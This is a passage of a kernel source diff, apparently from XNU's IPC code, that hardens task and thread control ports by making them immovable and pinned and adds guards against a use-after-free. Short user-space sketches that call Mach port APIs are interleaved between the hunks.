+       task->itk_task_ports[TASK_FLAVOR_NAME] = IP_NULL;
+
+       if (task->itk_dyld_notify) {
+               notifiers_ptr = task->itk_dyld_notify;
+               task->itk_dyld_notify = NULL;
+       }
+
+       if (immovable_control_port_enabled) {
+               pport = task->itk_self;
+               assert(pport != IP_NULL);
+       }
+
+       task->itk_self = IP_NULL;
 
        rport = task->itk_resume;
        task->itk_resume = IP_NULL;
@@ -403,12 +472,20 @@ ipc_task_terminate(
        itk_unlock(task);
 
        /* release the naked send rights */
+       if (IP_VALID(sself)) {
+               ipc_port_release_send(sself);
+       }
 
-       if (IP_VALID(task->itk_settable_self)) {
-               ipc_port_release_send(task->itk_settable_self);
+       if (notifiers_ptr) {
+               for (int i = 0; i < DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT; i++) {
+                       if (IP_VALID(notifiers_ptr[i])) {
+                               ipc_port_release_send(notifiers_ptr[i]);
+                       }
+               }
+               kfree(notifiers_ptr, DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT * sizeof(ipc_port_t));
        }
 
-       for (i = FIRST_EXCEPTION; i < EXC_TYPES_COUNT; i++) {
+       for (int i = FIRST_EXCEPTION; i < EXC_TYPES_COUNT; i++) {
                if (IP_VALID(task->exc_actions[i].port)) {
                        ipc_port_release_send(task->exc_actions[i].port);
                }
@@ -441,13 +518,22 @@ ipc_task_terminate(
                ipc_port_release_send(task->itk_debug_control);
        }
 
-       for (i = 0; i < TASK_PORT_REGISTER_MAX; i++) {
+       for (int i = 0; i < TASK_PORT_REGISTER_MAX; i++) {
                if (IP_VALID(task->itk_registered[i])) {
                        ipc_port_release_send(task->itk_registered[i]);
                }
        }
 
        /* destroy the kernel ports */
+       if (immovable_control_port_enabled) {
+               ip_lock(kport);
+               kport->ip_alt_port = IP_NULL;
+               ipc_kobject_set_atomically(kport, IKO_NULL, IKOT_NONE);
+               ip_unlock(kport);
+
+               /* pport == kport if immovability is off */
+               ipc_port_dealloc_kernel(pport);
+       }
        ipc_port_dealloc_kernel(kport);
        ipc_port_dealloc_kernel(nport);
        if (iport != IP_NULL) {
@@ -479,32 +565,53 @@ void
 ipc_task_reset(
        task_t          task)
 {
-       ipc_port_t old_kport, new_kport;
+       ipc_port_t old_kport, old_pport, new_kport, new_pport;
        ipc_port_t old_sself;
        ipc_port_t old_rdport;
        ipc_port_t old_iport;
        ipc_port_t old_exc_actions[EXC_TYPES_COUNT];
-       int i;
+       ipc_port_t *notifiers_ptr = NULL;
 
 #if CONFIG_MACF
        /* Fresh label to unset credentials in existing labels. */
        struct label *unset_label = mac_exc_create_label();
 #endif
 
-       new_kport = ipc_kobject_alloc_port((ipc_kobject_t)task, IKOT_TASK_CONTROL,
-           IPC_KOBJECT_ALLOC_MAKE_SEND);
+       if (immovable_control_port_enabled) {
+               ipc_kobject_alloc_options_t options = IPC_KOBJECT_ALLOC_IMMOVABLE_SEND;
+               if (pinned_control_port_enabled) {
+                       options |= IPC_KOBJECT_ALLOC_PINNED;
+               }
+
+               new_pport = ipc_kobject_alloc_port((ipc_kobject_t)task,
+                   IKOT_TASK_CONTROL, options);
+
+               new_kport = ipc_kobject_alloc_labeled_port((ipc_kobject_t)task,
+                   IKOT_TASK_CONTROL, IPC_LABEL_SUBST_TASK,
+                   IPC_KOBJECT_ALLOC_NONE);
+               new_kport->ip_alt_port = new_pport;
+       } else {
+               new_kport = ipc_kobject_alloc_port((ipc_kobject_t)task,
+                   IKOT_TASK_CONTROL, IPC_KOBJECT_ALLOC_NONE);
+
+               new_pport = new_kport;
+       }
 
        itk_lock(task);
 
-       old_kport = task->itk_self[TASK_FLAVOR_CONTROL];
-       old_rdport = task->itk_self[TASK_FLAVOR_READ];
-       old_iport = task->itk_self[TASK_FLAVOR_INSPECT];
+       old_kport = task->itk_task_ports[TASK_FLAVOR_CONTROL];
+       old_rdport = task->itk_task_ports[TASK_FLAVOR_READ];
+       old_iport = task->itk_task_ports[TASK_FLAVOR_INSPECT];
 
-       if (old_kport == IP_NULL) {
+       old_pport = task->itk_self;
+
+       if (old_pport == IP_NULL) {
                /* the task is already terminated (can this happen?) */
                itk_unlock(task);
-               ipc_port_release_send(new_kport);
                ipc_port_dealloc_kernel(new_kport);
+               if (immovable_control_port_enabled) {
+                       ipc_port_dealloc_kernel(new_pport);
+               }
 #if CONFIG_MACF
                mac_exc_free_label(unset_label);
 #endif
@@ -512,19 +619,30 @@ ipc_task_reset(
        }
 
        old_sself = task->itk_settable_self;
-       task->itk_settable_self = task->itk_self[TASK_FLAVOR_CONTROL] = new_kport;
+       task->itk_task_ports[TASK_FLAVOR_CONTROL] = new_kport;
+       task->itk_self = new_pport;
+
+       task->itk_settable_self = ipc_port_make_send(new_kport);
 
        /* Set the old kport to IKOT_NONE and update the exec token while under the port lock */
        ip_lock(old_kport);
+       old_kport->ip_alt_port = IP_NULL;
        ipc_kobject_set_atomically(old_kport, IKO_NULL, IKOT_NONE);
        task->exec_token += 1;
        ip_unlock(old_kport);
 
        /* Reset the read and inspect flavors of task port */
-       task->itk_self[TASK_FLAVOR_READ] = IP_NULL;
-       task->itk_self[TASK_FLAVOR_INSPECT] = IP_NULL;
+       task->itk_task_ports[TASK_FLAVOR_READ] = IP_NULL;
+       task->itk_task_ports[TASK_FLAVOR_INSPECT] = IP_NULL;
 
-       for (i = FIRST_EXCEPTION; i < EXC_TYPES_COUNT; i++) {
+       if (immovable_control_port_enabled) {
+               ip_lock(old_pport);
+               ipc_kobject_set_atomically(old_pport, IKO_NULL, IKOT_NONE);
+               task->exec_token += 1;
+               ip_unlock(old_pport);
+       }
+
+       for (int i = FIRST_EXCEPTION; i < EXC_TYPES_COUNT; i++) {
                old_exc_actions[i] = IP_NULL;
 
                if (i == EXC_CORPSE_NOTIFY && task_corpse_pending_report(task)) {
@@ -545,6 +663,11 @@ ipc_task_reset(
        }
        task->itk_debug_control = IP_NULL;
 
+       if (task->itk_dyld_notify) {
+               notifiers_ptr = task->itk_dyld_notify;
+               task->itk_dyld_notify = NULL;
+       }
+
        itk_unlock(task);
 
 #if CONFIG_MACF
@@ -557,7 +680,16 @@ ipc_task_reset(
                ipc_port_release_send(old_sself);
        }
 
-       for (i = FIRST_EXCEPTION; i < EXC_TYPES_COUNT; i++) {
+       if (notifiers_ptr) {
+               for (int i = 0; i < DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT; i++) {
+                       if (IP_VALID(notifiers_ptr[i])) {
+                               ipc_port_release_send(notifiers_ptr[i]);
+                       }
+               }
+               kfree(notifiers_ptr, DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT * sizeof(ipc_port_t));
+       }
+
+       for (int i = FIRST_EXCEPTION; i < EXC_TYPES_COUNT; i++) {
                if (IP_VALID(old_exc_actions[i])) {
                        ipc_port_release_send(old_exc_actions[i]);
                }
@@ -565,6 +697,9 @@ ipc_task_reset(
 
        /* destroy all task port flavors */
        ipc_port_dealloc_kernel(old_kport);
+       if (immovable_control_port_enabled) {
+               ipc_port_dealloc_kernel(old_pport);
+       }
        if (old_rdport != IP_NULL) {
                ipc_port_dealloc_kernel(old_rdport);
        }
@@ -583,16 +718,46 @@ ipc_task_reset(
 
 void
 ipc_thread_init(
-       thread_t        thread)
+       thread_t        thread,
+       ipc_thread_init_options_t options)
 {
        ipc_port_t      kport;
+       ipc_port_t      pport;
+       ipc_kobject_alloc_options_t alloc_options = IPC_KOBJECT_ALLOC_NONE;
+
+       /*
+        * Having the immovable_control_port_enabled boot-arg set does not guarantee
+        * the thread control port is made immovable/pinned; the options must ask for it too.
+        *
+        * Raw Mach threads created via thread_create() have neither INIT_PINNED
+        * nor INIT_IMMOVABLE set.
+        */
+       if (immovable_control_port_enabled && (options & IPC_THREAD_INIT_IMMOVABLE)) {
+               alloc_options |= IPC_KOBJECT_ALLOC_IMMOVABLE_SEND;
+
+               if (pinned_control_port_enabled && (options & IPC_THREAD_INIT_PINNED)) {
+                       alloc_options |= IPC_KOBJECT_ALLOC_PINNED;
+               }
+
+               pport = ipc_kobject_alloc_port((ipc_kobject_t)thread,
+                   IKOT_THREAD_CONTROL, alloc_options);
+
+               kport = ipc_kobject_alloc_labeled_port((ipc_kobject_t)thread,
+                   IKOT_THREAD_CONTROL, IPC_LABEL_SUBST_THREAD, IPC_KOBJECT_ALLOC_NONE);
+               kport->ip_alt_port = pport;
+       } else {
+               kport = ipc_kobject_alloc_port((ipc_kobject_t)thread,
+                   IKOT_THREAD_CONTROL, IPC_KOBJECT_ALLOC_NONE);
+
+               pport = kport;
+       }
+
+       thread->ith_thread_ports[THREAD_FLAVOR_CONTROL] = kport;
+
+       thread->ith_settable_self = ipc_port_make_send(kport);
 
-       kport = ipc_kobject_alloc_port((ipc_kobject_t)thread, IKOT_THREAD_CONTROL,
-           IPC_KOBJECT_ALLOC_MAKE_SEND);
+       thread->ith_self = pport;
 
-       thread->ith_settable_self = thread->ith_self[THREAD_FLAVOR_CONTROL] = kport;
-       thread->ith_self[THREAD_FLAVOR_INSPECT] = IP_NULL;
-       thread->ith_self[THREAD_FLAVOR_READ] = IP_NULL;
        thread->ith_special_reply_port = NULL;
        thread->exc_actions = NULL;
 
@@ -600,6 +765,7 @@ ipc_thread_init(
        thread->ith_assertions = 0;
 #endif
 
+       thread->ipc_active = true;
        ipc_kmsg_queue_init(&thread->ith_messages);
 
        thread->ith_rpc_reply = IP_NULL;
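
As the comment above notes, only creation paths that pass IPC_THREAD_INIT_IMMOVABLE/IPC_THREAD_INIT_PINNED get the hardened ports. A small user-space sketch that exercises the other path, a raw Mach thread made with thread_create(); the behavioral note in the comment is an inference from the hunk above, not something verified here:

#include <mach/mach.h>
#include <stdio.h>

int
main(void)
{
    mach_port_t t = MACH_PORT_NULL;

    /* A raw Mach thread reaches ipc_thread_init() without the IMMOVABLE/PINNED
     * options, so its control port is expected to stay movable even with the
     * immovable-control-port boot-arg enabled. */
    kern_return_t kr = thread_create(mach_task_self(), &t);
    if (kr == KERN_SUCCESS) {
        printf("raw thread control port name: 0x%x\n", t);
        (void)thread_terminate(t);
        (void)mach_port_deallocate(mach_task_self(), t);
    }
    return 0;
}
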
@@ -649,12 +815,26 @@ void
 ipc_thread_disable(
        thread_t        thread)
 {
-       ipc_port_t      kport = thread->ith_self[THREAD_FLAVOR_CONTROL];
-       ipc_port_t      iport = thread->ith_self[THREAD_FLAVOR_INSPECT];
-       ipc_port_t      rdport = thread->ith_self[THREAD_FLAVOR_READ];
+       ipc_port_t      kport = thread->ith_thread_ports[THREAD_FLAVOR_CONTROL];
+       ipc_port_t      iport = thread->ith_thread_ports[THREAD_FLAVOR_INSPECT];
+       ipc_port_t      rdport = thread->ith_thread_ports[THREAD_FLAVOR_READ];
+       ipc_port_t      pport = thread->ith_self;
+
+       /*
+        * This innocuous-looking line is load-bearing.
+        *
+        * It is used to disable the creation of lazily made ports.
+        * We must do so before we drop the last reference on the thread,
+        * as thread ports do not own a reference on the thread, and
+        * convert_port_to_thread* will crash trying to resurrect a thread.
+        */
+       thread->ipc_active = false;
 
        if (kport != IP_NULL) {
-               ipc_kobject_set(kport, IKO_NULL, IKOT_NONE);
+               ip_lock(kport);
+               kport->ip_alt_port = IP_NULL;
+               ipc_kobject_set_atomically(kport, IKO_NULL, IKOT_NONE);
+               ip_unlock(kport);
        }
 
        if (iport != IP_NULL) {
@@ -665,6 +845,12 @@ ipc_thread_disable(
                ipc_kobject_set(rdport, IKO_NULL, IKOT_NONE);
        }
 
+       if (pport != kport && pport != IP_NULL) {
+               assert(immovable_control_port_enabled);
+               assert(pport->ip_immovable_send);
+               ipc_kobject_set(pport, IKO_NULL, IKOT_NONE);
+       }
+
        /* unbind the thread special reply port */
        if (IP_VALID(thread->ith_special_reply_port)) {
                ipc_port_unbind_special_reply_port(thread, TRUE);
@@ -687,21 +873,33 @@ ipc_thread_terminate(
        ipc_port_t iport = IP_NULL;
        ipc_port_t rdport = IP_NULL;
        ipc_port_t ith_rpc_reply = IP_NULL;
+       ipc_port_t pport = IP_NULL;
 
        thread_mtx_lock(thread);
 
-       kport = thread->ith_self[THREAD_FLAVOR_CONTROL];
-       iport = thread->ith_self[THREAD_FLAVOR_INSPECT];
-       rdport = thread->ith_self[THREAD_FLAVOR_READ];
+       /*
+        * If we ever failed to clear ipc_active before the last reference
+        * was dropped, lazy ports could still be created and used after the
+        * last reference is dropped, causing a use-after-free (see the
+        * comment in ipc_thread_disable()).
+        */
+       assert(!thread->ipc_active);
+
+       kport = thread->ith_thread_ports[THREAD_FLAVOR_CONTROL];
+       iport = thread->ith_thread_ports[THREAD_FLAVOR_INSPECT];
+       rdport = thread->ith_thread_ports[THREAD_FLAVOR_READ];
+       pport = thread->ith_self;
 
        if (kport != IP_NULL) {
                if (IP_VALID(thread->ith_settable_self)) {
                        ipc_port_release_send(thread->ith_settable_self);
                }
 
-               thread->ith_settable_self = thread->ith_self[THREAD_FLAVOR_CONTROL] = IP_NULL;
-               thread->ith_self[THREAD_FLAVOR_INSPECT] = IP_NULL;
-               thread->ith_self[THREAD_FLAVOR_READ] = IP_NULL;
+               thread->ith_thread_ports[THREAD_FLAVOR_CONTROL] = IP_NULL;
+               thread->ith_thread_ports[THREAD_FLAVOR_READ] = IP_NULL;
+               thread->ith_thread_ports[THREAD_FLAVOR_INSPECT] = IP_NULL;
+               thread->ith_settable_self = IP_NULL;
+               thread->ith_self = IP_NULL;
 
                if (thread->exc_actions != NULL) {
                        for (int i = FIRST_EXCEPTION; i < EXC_TYPES_COUNT; ++i) {
@@ -723,6 +921,14 @@ ipc_thread_terminate(
 
        thread_mtx_unlock(thread);
 
+       if (pport != kport && pport != IP_NULL) {
+               /* this thread has an immovable control port */
+               ip_lock(kport);
+               kport->ip_alt_port = IP_NULL;
+               ipc_kobject_set_atomically(kport, IKO_NULL, IKOT_NONE);
+               ip_unlock(kport);
+               ipc_port_dealloc_kernel(pport);
+       }
        if (kport != IP_NULL) {
                ipc_port_dealloc_kernel(kport);
        }
@@ -754,45 +960,80 @@ void
 ipc_thread_reset(
        thread_t        thread)
 {
-       ipc_port_t old_kport, new_kport;
+       ipc_port_t old_kport, new_kport, old_pport, new_pport;
        ipc_port_t old_sself;
        ipc_port_t old_rdport;
        ipc_port_t old_iport;
        ipc_port_t old_exc_actions[EXC_TYPES_COUNT];
        boolean_t  has_old_exc_actions = FALSE;
+       boolean_t thread_is_immovable, thread_is_pinned;
        int i;
 
 #if CONFIG_MACF
        struct label *new_label = mac_exc_create_label();
 #endif
 
-       new_kport = ipc_kobject_alloc_port((ipc_kobject_t)thread, IKOT_THREAD_CONTROL,
-           IPC_KOBJECT_ALLOC_MAKE_SEND);
+       thread_is_immovable = thread->ith_self->ip_immovable_send;
+       thread_is_pinned = thread->ith_self->ip_pinned;
+
+       if (thread_is_immovable) {
+               ipc_kobject_alloc_options_t alloc_options = IPC_KOBJECT_ALLOC_NONE;
+
+               if (thread_is_pinned) {
+                       assert(pinned_control_port_enabled);
+                       alloc_options |= IPC_KOBJECT_ALLOC_PINNED;
+               }
+               if (thread_is_immovable) {
+                       alloc_options |= IPC_KOBJECT_ALLOC_IMMOVABLE_SEND;
+               }
+               new_pport = ipc_kobject_alloc_port((ipc_kobject_t)thread,
+                   IKOT_THREAD_CONTROL, alloc_options);
+
+               new_kport = ipc_kobject_alloc_labeled_port((ipc_kobject_t)thread,
+                   IKOT_THREAD_CONTROL, IPC_LABEL_SUBST_THREAD,
+                   IPC_KOBJECT_ALLOC_NONE);
+               new_kport->ip_alt_port = new_pport;
+       } else {
+               new_kport = ipc_kobject_alloc_port((ipc_kobject_t)thread,
+                   IKOT_THREAD_CONTROL, IPC_KOBJECT_ALLOC_NONE);
+
+               new_pport = new_kport;
+       }
 
        thread_mtx_lock(thread);
 
-       old_kport = thread->ith_self[THREAD_FLAVOR_CONTROL];
-       old_rdport = thread->ith_self[THREAD_FLAVOR_READ];
-       old_iport = thread->ith_self[THREAD_FLAVOR_INSPECT];
+       old_kport = thread->ith_thread_ports[THREAD_FLAVOR_CONTROL];
+       old_rdport = thread->ith_thread_ports[THREAD_FLAVOR_READ];
+       old_iport = thread->ith_thread_ports[THREAD_FLAVOR_INSPECT];
+
        old_sself = thread->ith_settable_self;
+       old_pport = thread->ith_self;
 
        if (old_kport == IP_NULL && thread->inspection == FALSE) {
-               /* th is already terminated (can this happen?) */
+               /* thread is already terminated (can this happen?) */
                thread_mtx_unlock(thread);
-               ipc_port_release_send(new_kport);
                ipc_port_dealloc_kernel(new_kport);
+               if (thread_is_immovable) {
+                       ipc_port_dealloc_kernel(new_pport);
+               }
 #if CONFIG_MACF
                mac_exc_free_label(new_label);
 #endif
                return;
        }
 
-       thread->ith_settable_self = thread->ith_self[THREAD_FLAVOR_CONTROL] = new_kport;
-       thread->ith_self[THREAD_FLAVOR_READ] = IP_NULL;
-       thread->ith_self[THREAD_FLAVOR_INSPECT] = IP_NULL;
+       thread->ipc_active = true;
+       thread->ith_thread_ports[THREAD_FLAVOR_CONTROL] = new_kport;
+       thread->ith_self = new_pport;
+       thread->ith_settable_self = ipc_port_make_send(new_kport);
+       thread->ith_thread_ports[THREAD_FLAVOR_INSPECT] = IP_NULL;
+       thread->ith_thread_ports[THREAD_FLAVOR_READ] = IP_NULL;
 
        if (old_kport != IP_NULL) {
-               ipc_kobject_set(old_kport, IKO_NULL, IKOT_NONE);
+               ip_lock(old_kport);
+               old_kport->ip_alt_port = IP_NULL;
+               ipc_kobject_set_atomically(old_kport, IKO_NULL, IKOT_NONE);
+               ip_unlock(old_kport);
        }
        if (old_rdport != IP_NULL) {
                ipc_kobject_set(old_rdport, IKO_NULL, IKOT_NONE);
@@ -800,6 +1041,9 @@ ipc_thread_reset(
        if (old_iport != IP_NULL) {
                ipc_kobject_set(old_iport, IKO_NULL, IKOT_NONE);
        }
+       if (thread_is_immovable && old_pport != IP_NULL) {
+               ipc_kobject_set(old_pport, IKO_NULL, IKOT_NONE);
+       }
 
        /*
         * Only ports that were set by root-owned processes
@@ -849,6 +1093,10 @@ ipc_thread_reset(
                ipc_port_dealloc_kernel(old_iport);
        }
 
+       if (thread_is_immovable && old_pport != IP_NULL) {
+               ipc_port_dealloc_kernel(old_pport);
+       }
+
        /* unbind the thread special reply port */
        if (IP_VALID(thread->ith_special_reply_port)) {
                ipc_port_unbind_special_reply_port(thread, TRUE);
@@ -871,26 +1119,51 @@ ipc_port_t
 retrieve_task_self_fast(
        task_t          task)
 {
-       __assert_only ipc_port_t sright;
-       ipc_port_t port;
+       ipc_port_t port = IP_NULL;
 
        assert(task == current_task());
 
        itk_lock(task);
-       assert(task->itk_self[TASK_FLAVOR_CONTROL] != IP_NULL);
-
-       if ((port = task->itk_settable_self) == task->itk_self[TASK_FLAVOR_CONTROL]) {
-               /* no interposing */
-               sright = ipc_port_copy_send(port);
-               assert(sright == port);
+       assert(task->itk_self != IP_NULL);
+
+       if (task->itk_settable_self == task->itk_task_ports[TASK_FLAVOR_CONTROL]) {
+               /* no interposing, return the IMMOVABLE port */
+               port = ipc_port_make_send(task->itk_self);
+               if (immovable_control_port_enabled) {
+                       assert(port->ip_immovable_send == 1);
+                       if (pinned_control_port_enabled) {
+                               /* pinned port is also immovable */
+                               assert(port->ip_pinned == 1);
+                       }
+               }
        } else {
-               port = ipc_port_copy_send(port);
+               port = ipc_port_copy_send(task->itk_settable_self);
        }
        itk_unlock(task);
 
        return port;
 }
 
+/*
+ *     Routine:        mach_task_is_self
+ *     Purpose:
+ *      [MIG call] Checks if the task (control/read/inspect/name/movable)
+ *      port refers to the caller's task (current_task()).
+ */
+kern_return_t
+mach_task_is_self(
+       task_t         task,
+       boolean_t     *is_self)
+{
+       if (task == TASK_NULL) {
+               return KERN_INVALID_ARGUMENT;
+       }
+
+       *is_self = (task == current_task());
+
+       return KERN_SUCCESS;
+}
+
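
A minimal caller-side sketch for the new MIG routine, assuming the generated user stub is exported as mach_task_is_self() alongside the other task routines:

#include <mach/mach.h>
#include <mach/mach_error.h>
#include <stdio.h>

int
main(void)
{
    boolean_t is_self = FALSE;

    /* Any flavor of the caller's own task port should report true. */
    kern_return_t kr = mach_task_is_self(mach_task_self(), &is_self);
    if (kr != KERN_SUCCESS) {
        fprintf(stderr, "mach_task_is_self: %s\n", mach_error_string(kr));
        return 1;
    }
    printf("is_self = %d\n", (int)is_self);
    return 0;
}
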
 /*
  *     Routine:        retrieve_thread_self_fast
  *     Purpose:
@@ -907,21 +1180,19 @@ ipc_port_t
 retrieve_thread_self_fast(
        thread_t                thread)
 {
-       __assert_only ipc_port_t sright;
-       ipc_port_t port;
+       ipc_port_t port = IP_NULL;
 
        assert(thread == current_thread());
 
        thread_mtx_lock(thread);
 
-       assert(thread->ith_self[THREAD_FLAVOR_CONTROL] != IP_NULL);
+       assert(thread->ith_self != IP_NULL);
 
-       if ((port = thread->ith_settable_self) == thread->ith_self[THREAD_FLAVOR_CONTROL]) {
-               /* no interposing */
-               sright = ipc_port_copy_send(port);
-               assert(sright == port);
+       if (thread->ith_settable_self == thread->ith_thread_ports[THREAD_FLAVOR_CONTROL]) {
+               /* no interposing, return the IMMOVABLE port */
+               port = ipc_port_make_send(thread->ith_self);
        } else {
-               port = ipc_port_copy_send(port);
+               port = ipc_port_copy_send(thread->ith_settable_self);
        }
 
        thread_mtx_unlock(thread);
@@ -1129,8 +1400,7 @@ thread_get_special_port(
        int                      which,
        ipc_port_t              *portp);
 
-kern_return_t
-static
+static kern_return_t
 thread_get_special_port_internal(
        thread_inspect_t         thread,
        int                      which,
@@ -1176,7 +1446,6 @@ thread_get_special_port_internal(
        }
 
        *portp = port;
-
        return KERN_SUCCESS;
 }
 
@@ -1189,6 +1458,26 @@ thread_get_special_port(
        return thread_get_special_port_internal(thread, which, portp, THREAD_FLAVOR_CONTROL);
 }
 
+static ipc_port_t
+thread_get_non_substituted_self(thread_t thread)
+{
+       ipc_port_t port = IP_NULL;
+
+       thread_mtx_lock(thread);
+       port = thread->ith_settable_self;
+       if (IP_VALID(port)) {
+               ip_reference(port);
+       }
+       thread_mtx_unlock(thread);
+
+       if (IP_VALID(port)) {
+               /* consumes the port reference */
+               return ipc_kobject_alloc_subst_once(port);
+       }
+
+       return port;
+}
+
 kern_return_t
 thread_get_special_port_from_user(
        mach_port_t     port,
@@ -1196,29 +1485,49 @@ thread_get_special_port_from_user(
        ipc_port_t      *portp)
 {
        ipc_kobject_type_t kotype;
-       kern_return_t kr;
+       mach_thread_flavor_t flavor;
+       kern_return_t kr = KERN_SUCCESS;
 
-       thread_t thread = convert_port_to_thread_check_type(port, &kotype, THREAD_FLAVOR_INSPECT, FALSE);
+       thread_t thread = convert_port_to_thread_check_type(port, &kotype,
+           THREAD_FLAVOR_INSPECT, FALSE);
 
        if (thread == THREAD_NULL) {
                return KERN_INVALID_ARGUMENT;
        }
 
+       if (which == THREAD_KERNEL_PORT && thread->task == current_task()) {
+#if CONFIG_MACF
+               /*
+                * only check for threads belonging to current_task,
+                * because foreign thread ports are always movable
+                */
+               if (mac_task_check_get_movable_control_port()) {
+                       kr = KERN_DENIED;
+                       goto out;
+               }
+#endif
+               if (kotype == IKOT_THREAD_CONTROL) {
+                       *portp = thread_get_non_substituted_self(thread);
+                       goto out;
+               }
+       }
+
        switch (kotype) {
        case IKOT_THREAD_CONTROL:
-               kr = thread_get_special_port_internal(thread, which, portp, THREAD_FLAVOR_CONTROL);
+               flavor = THREAD_FLAVOR_CONTROL;
                break;
        case IKOT_THREAD_READ:
-               kr = thread_get_special_port_internal(thread, which, portp, THREAD_FLAVOR_READ);
+               flavor = THREAD_FLAVOR_READ;
                break;
        case IKOT_THREAD_INSPECT:
-               kr = thread_get_special_port_internal(thread, which, portp, THREAD_FLAVOR_INSPECT);
+               flavor = THREAD_FLAVOR_INSPECT;
                break;
        default:
                panic("strange kobject type");
-               break;
        }
 
+       kr = thread_get_special_port_internal(thread, which, portp, flavor);
+out:
        thread_deallocate(thread);
        return kr;
 }
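
Caller-side view of the path above: requesting THREAD_KERNEL_PORT for one of the calling task's own threads. The expectation in the comment is inferred from the hunk above rather than verified:

#include <mach/mach.h>
#include <stdio.h>

int
main(void)
{
    mach_port_t self_thread = mach_thread_self();
    mach_port_t kport = MACH_PORT_NULL;

    /* For a thread of the calling task this now goes through
     * thread_get_non_substituted_self() (unless MACF denies it with
     * KERN_DENIED), so the right handed back is a movable one rather than
     * the pinned control port itself. */
    kern_return_t kr = thread_get_special_port(self_thread, THREAD_KERNEL_PORT, &kport);
    printf("kr = 0x%x, port = 0x%x\n", kr, kport);

    if (kr == KERN_SUCCESS && MACH_PORT_VALID(kport)) {
        (void)mach_port_deallocate(mach_task_self(), kport);
    }
    (void)mach_port_deallocate(mach_task_self(), self_thread);
    return 0;
}
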
@@ -1267,6 +1576,7 @@ port_allowed_with_thread_flavor(
  *     Returns:
  *             KERN_SUCCESS            Changed the special port.
  *             KERN_INVALID_ARGUMENT   The thread is null.
+ *      KERN_INVALID_RIGHT      Port is marked as immovable.
  *             KERN_FAILURE            The thread is dead.
  *             KERN_INVALID_ARGUMENT   Invalid special port.
  *             KERN_NO_ACCESS          Restricted access to set port.
@@ -1276,7 +1586,7 @@ kern_return_t
 thread_set_special_port(
        thread_t                thread,
        int                     which,
-       ipc_port_t      port)
+       ipc_port_t              port)
 {
        kern_return_t   result = KERN_SUCCESS;
        ipc_port_t              *whichp, old = IP_NULL;
@@ -1285,6 +1595,10 @@ thread_set_special_port(
                return KERN_INVALID_ARGUMENT;
        }
 
+       if (IP_VALID(port) && (port->ip_immovable_receive || port->ip_immovable_send)) {
+               return KERN_INVALID_RIGHT;
+       }
+
        switch (which) {
        case THREAD_KERNEL_PORT:
 #if CONFIG_CSR
@@ -1330,9 +1644,9 @@ thread_set_special_port(
  *     Conditions:
  *             Nothing locked.
  *     Returns:
- *             KERN_SUCCESS            Extracted a send right.
+ *             KERN_SUCCESS                Extracted a send right.
  *             KERN_INVALID_ARGUMENT   The task is null.
- *             KERN_FAILURE            The task/space is dead.
+ *             KERN_FAILURE                The task/space is dead.
  *             KERN_INVALID_ARGUMENT   Invalid special port.
  */
 
@@ -1361,7 +1675,7 @@ task_get_special_port_internal(
        }
 
        itk_lock(task);
-       if (task->itk_self[TASK_FLAVOR_CONTROL] == IP_NULL) {
+       if (!task->ipc_active) {
                itk_unlock(task);
                return KERN_FAILURE;
        }
@@ -1369,6 +1683,7 @@ task_get_special_port_internal(
        switch (which) {
        case TASK_KERNEL_PORT:
                port = ipc_port_copy_send(task->itk_settable_self);
+               itk_unlock(task);
                break;
 
        case TASK_READ_PORT:
@@ -1379,30 +1694,36 @@ task_get_special_port_internal(
                /* convert_task_to_port_with_flavor consumes a task reference */
                task_reference(task);
                port = convert_task_to_port_with_flavor(task, current_flavor);
-               goto copyout;
+               break;
 
        case TASK_NAME_PORT:
-               port = ipc_port_make_send(task->itk_self[TASK_FLAVOR_NAME]);
+               port = ipc_port_make_send(task->itk_task_ports[TASK_FLAVOR_NAME]);
+               itk_unlock(task);
                break;
 
        case TASK_HOST_PORT:
                port = ipc_port_copy_send(task->itk_host);
+               itk_unlock(task);
                break;
 
        case TASK_BOOTSTRAP_PORT:
                port = ipc_port_copy_send(task->itk_bootstrap);
+               itk_unlock(task);
                break;
 
        case TASK_SEATBELT_PORT:
                port = ipc_port_copy_send(task->itk_seatbelt);
+               itk_unlock(task);
                break;
 
        case TASK_ACCESS_PORT:
                port = ipc_port_copy_send(task->itk_task_access);
+               itk_unlock(task);
                break;
 
        case TASK_DEBUG_CONTROL_PORT:
                port = ipc_port_copy_send(task->itk_debug_control);
+               itk_unlock(task);
                break;
 
        default:
@@ -1410,9 +1731,6 @@ task_get_special_port_internal(
                return KERN_INVALID_ARGUMENT;
        }
 
-       itk_unlock(task);
-
-copyout:
        *portp = port;
        return KERN_SUCCESS;
 }
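
For reference, the usual caller of this path; the per-case itk_unlock() restructuring above does not change the user-visible behavior of, e.g., fetching the bootstrap port:

#include <mach/mach.h>
#include <stdio.h>

int
main(void)
{
    mach_port_t bootstrap = MACH_PORT_NULL;

    kern_return_t kr = task_get_special_port(mach_task_self(),
        TASK_BOOTSTRAP_PORT, &bootstrap);
    if (kr == KERN_SUCCESS) {
        printf("bootstrap port name: 0x%x\n", bootstrap);
        (void)mach_port_deallocate(mach_task_self(), bootstrap);
    }
    return 0;
}
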
@@ -1426,6 +1744,25 @@ task_get_special_port(
        return task_get_special_port_internal(task, which, portp, TASK_FLAVOR_CONTROL);
 }
 
+static ipc_port_t
+task_get_non_substituted_self(task_t task)
+{
+       ipc_port_t port = IP_NULL;
+
+       itk_lock(task);
+       port = task->itk_settable_self;
+       if (IP_VALID(port)) {
+               ip_reference(port);
+       }
+       itk_unlock(task);
+
+       if (IP_VALID(port)) {
+               /* consumes the port reference */
+               return ipc_kobject_alloc_subst_once(port);
+       }
+
+       return port;
+}
 kern_return_t
 task_get_special_port_from_user(
        mach_port_t     port,
@@ -1433,29 +1770,49 @@ task_get_special_port_from_user(
        ipc_port_t      *portp)
 {
        ipc_kobject_type_t kotype;
-       kern_return_t kr;
+       mach_task_flavor_t flavor;
+       kern_return_t kr = KERN_SUCCESS;
 
-       task_t task = convert_port_to_task_check_type(port, &kotype, TASK_FLAVOR_INSPECT, FALSE);
+       task_t task = convert_port_to_task_check_type(port, &kotype,
+           TASK_FLAVOR_INSPECT, FALSE);
 
        if (task == TASK_NULL) {
                return KERN_INVALID_ARGUMENT;
        }
 
+       if (which == TASK_KERNEL_PORT && task == current_task()) {
+#if CONFIG_MACF
+               /*
+                * only check for current_task,
+                * because foreign task ports are always movable
+                */
+               if (mac_task_check_get_movable_control_port()) {
+                       kr = KERN_DENIED;
+                       goto out;
+               }
+#endif
